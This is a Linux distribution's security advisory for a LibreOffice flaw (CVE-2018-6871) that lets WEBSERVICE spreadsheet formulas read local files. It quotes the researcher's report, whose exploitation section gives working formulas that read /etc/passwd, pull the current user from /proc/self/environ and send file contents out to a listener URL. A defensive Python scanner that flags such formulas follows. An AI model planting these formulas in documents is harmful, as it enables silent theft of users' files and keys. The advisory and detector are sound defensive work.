CLD-286 Details

Other IDs this deficiency may be known by:

CVE ID CVE-2018-6871 (nvd) (mitre) (debian) (archlinux) (red hat) (suse) (ubuntu)
Other ID(s)

Basic Information:

Affected Package(s) libreoffice
Deficiency Type SECURITY
Date Created 2018-02-09 19:10:40
Date Last Modified 2018-02-22 12:13:12

Version Specific Information:

Cucumber 1.0 i686 fixed in libreoffice-5.3.7.2-i686-2
Cucumber 1.0 x86_64 fixed in libreoffice-5.3.7.2-x86_64-2

Cucumber 1.1 i686 fixed in libreoffice-5.3.7.2-i686-2
Cucumber 1.1 x86_64 fixed in libreoffice-5.3.7.2-x86_64-2

Details:

********* THIS VULNERABILITY HAS THE DUPLICATE CVE ID OF CVE-2018-1055 *********

The ID CVE-2018-6871 should be used instead of CVE-2018-1055. See:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1055

=================================== Overview ===================================

LibreOffice through 6.0.1 allows remote attackers to read arbitrary files via
=WEBSERVICE calls in a document, which use the COM.MICROSOFT.WEBSERVICE
function.

================================ Initial Report ================================

From https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure:

Vulnerability description

CVE-2018-6871

First part

LibreOffice supports COM.MICROSOFT.WEBSERVICE function:

https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4

The function is required to obtain data by URL, usually used as:

=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")

In the original:

For protocols that are not supported, such as ftp:// or file://, WEBSERVICE
returns the #VALUE! error value.

In LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.

Second part

By default the cells are not updated, but if you specify the cell type like
~error, then the cell will be updated when you open the document.

Exploitation

To read a file you just need:

=WEBSERVICE("/etc/passwd")

This function can also be used to send a file:

=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))

For successful operation, you need to send the files of the current user, so
you need to retrieve the current user's home path.

=MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",

You can also parse other files, like ~/.ssh/config or something like that.

For formats other than LibreOffice Calc you just need to embed a Calc object in
another document (I checked that it works).

Impact

It is easy to send any files with keys, passwords and anything else. 100%
success rate, absolutely silent, affects LibreOffice prior to 5.4.5/6.0.1 on all
operating systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in
almost all formats supported by LO.

Acknowledgment

The vulnerability was independently found by me (@jollheef) and by Ronnie
Goodrich and Andrew Krasichkov (according to LibreOffice team notes).

============================ Additional Information ============================

From the official LibreOffice security advisory
(https://www.libreoffice.org/about-us/security/advisories/cve-2018-1055/):

Announced: February 9, 2018

Fixed in: LibreOffice 5.4.5/6.0.1

Description:

LibreOffice Calc supports a WEBSERVICE function to obtain data by URL.
Vulnerable versions of LibreOffice allow WEBSERVICE to take a local file URL
(e.g. file://) which can be used to inject local files into the spreadsheet
without warning the user. Subsequent formulas can operate on that inserted data
and construct a remote URL whose path leaks the local data to a remote
attacker.

In later versions of LibreOffice without this flaw, WEBSERVICE has now been
limited to accessing http and https URLs along with bringing WEBSERVICE URLs
under LibreOffice Calc's link management infrastructure.


All users are recommended to upgrade to LibreOffice >= 5.4.5 or >= 6.0.1

Thanks to Ronnie Goodrich and Andrew Krasichkov for discovering this flaw.

================================= Our Analysis =================================

----- Affected Products -----
Versions of LibreOffice prior to 6.0.1 and 5.4.5 that have not had the patch
from
https://cgit.freedesktop.org/libreoffice/core/commit/?h=libreoffice-5-4-5&id=a916fc0c0e0e8b10cb4158fa0fa173fe205d434a
applied are affected by this vulnerability. This includes LibreOffice as
originally packaged on Cucumber Linux 1.0 and 1.1. Versions greater than or
equal to 6.0.1 or 5.4.5 are not affected.

----- Scope and Impact of this Vulnerability -----
This vulnerability allows a remote attacker to read an arbitrary file via a
specially crafted document. All that is required from the end user is opening
the malicious document in an affected version of LibreOffice.

----- Fix for this Vulnerability -----
This vulnerability can be fixed by upgrading to LibreOffice 6.0.1 or 5.4.5 or by
applying the patch from
https://cgit.freedesktop.org/libreoffice/core/commit/?h=libreoffice-5-4-5&id=a916fc0c0e0e8b10cb4158fa0fa173fe205d434a.
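The LibreOffice advisory quoted above says the fix limits WEBSERVICE to http and
https URLs. The following is an added example, not code from this advisory,
from LibreOffice, or from the upstream patch: it models that allowlist as a
small check, and uses the same check to scan an .ods file's content.xml for
WEBSERVICE formulas whose argument is a local path or non-http URL (what an
unpatched build would read) or a non-literal argument that cannot be judged
statically. The sample document is constructed in memory from the formulas in
the report above plus one constructed formula, WEBSERVICE(A1), with a
cell-reference argument; the scanner's internals (regexes, finding fields) are
this example's own, not anything LibreOffice does.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit
from xml.sax.saxutils import quoteattr

# The advisory says the fix restricts WEBSERVICE to http and https. This
# allowlist models that described behaviour; it is not LibreOffice's own code.
ALLOWED_SCHEMES = {"http", "https"}

# ODF stores a cell's formula in the table:formula attribute of table:table-cell.
TABLE_NS = "urn:oasis:names:tc:opendocument:xmlns:table:1.0"
FORMULA_ATTR = "{%s}formula" % TABLE_NS

# A WEBSERVICE call with a literal string argument: WEBSERVICE("...")
WEBSERVICE_LITERAL = re.compile(r'WEBSERVICE\(\s*"([^"]*)"', re.IGNORECASE)
# Any WEBSERVICE call, whatever its argument
WEBSERVICE_CALL = re.compile(r"WEBSERVICE\(", re.IGNORECASE)


def webservice_url_allowed(url: str) -> bool:
    """True only for an http(s) URL that has a host part.

    A bare path such as /etc/passwd, a file:// or ftp:// URL, or an empty
    string is what the fixed WEBSERVICE refuses (it returns #VALUE!).
    """
    parts = urlsplit(url.strip())
    return parts.scheme.lower() in ALLOWED_SCHEMES and bool(parts.netloc)


def scan_ods_formulas(ods_bytes: bytes) -> list[dict]:
    """Report every cell formula in an .ods file that calls WEBSERVICE.

    A finding is suspicious when a literal argument fails the allowlist
    (a local file read on an unpatched build) or when some WEBSERVICE call
    takes a non-literal argument that cannot be judged without evaluation.
    """
    with zipfile.ZipFile(io.BytesIO(ods_bytes)) as archive:
        root = ET.fromstring(archive.read("content.xml"))

    findings = []
    for element in root.iter():  # document order, i.e. cell order
        formula = element.get(FORMULA_ATTR)
        if not formula or not WEBSERVICE_CALL.search(formula):
            continue
        literal_args = WEBSERVICE_LITERAL.findall(formula)
        non_http = [u for u in literal_args if not webservice_url_allowed(u)]
        calls = len(WEBSERVICE_CALL.findall(formula))
        dynamic = calls > len(literal_args)
        findings.append({
            "formula": formula,
            "calls": calls,
            "non_http_args": non_http,
            "dynamic_args": dynamic,
            "suspicious": bool(non_http) or dynamic,
        })
    return findings


def build_sample_ods(formulas: list[str]) -> bytes:
    """Constructed test input: a minimal .ods with one cell per formula."""
    cells = "".join(
        "<table:table-cell table:formula=" + quoteattr("of:=" + f)
        + ' office:value-type="string"/>'
        for f in formulas
    )
    content = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        + '<office:document-content'
        + ' xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"'
        + ' xmlns:table="' + TABLE_NS + '">'
        + "<office:body><office:spreadsheet>"
        + '<table:table table:name="Sheet1"><table:table-row>' + cells
        + "</table:table-row></table:table></office:spreadsheet></office:body>"
        + "</office:document-content>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        # ODF convention: the mimetype entry comes first, stored uncompressed
        archive.writestr("mimetype", "application/vnd.oasis.opendocument.spreadsheet",
                         compress_type=zipfile.ZIP_STORED)
        archive.writestr("content.xml", content, compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


# Formulas from the report above, plus a constructed WEBSERVICE(A1) whose
# argument is a cell reference and so cannot be judged statically.
SAMPLE_FORMULAS = [
    'WEBSERVICE("/etc/passwd")',
    'WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))',
    'FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast'
    '?q=Copenhagen,dk&mode=xml&units=metric");'
    '"number(/weatherdata/forecast/time[2]/temperature/@value)")',
    "WEBSERVICE(A1)",
]


def scan_sample() -> list[dict]:
    return scan_ods_formulas(build_sample_ods(SAMPLE_FORMULAS))


if __name__ == "__main__":
    for finding in scan_sample():
        flag = "SUSPICIOUS" if finding["suspicious"] else "ok"
        print(f"{flag:10} calls={finding['calls']} non_http={finding['non_http_args']}"
              f" dynamic={finding['dynamic_args']}  {finding['formula']}")
```

The first two sample formulas are flagged because "/etc/passwd" fails the
allowlist, the weather lookup passes, and WEBSERVICE(A1) is flagged only as
dynamic. Flagging non-literal arguments is deliberate: a scanner that only
matches literal local paths misses any formula that assembles its argument from
other cells, so for a gateway or mail filter the dynamic case should be treated
as worth a look rather than as clean.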

================================= Our Solution =================================

We have applied the aforementioned patch and rebuilt.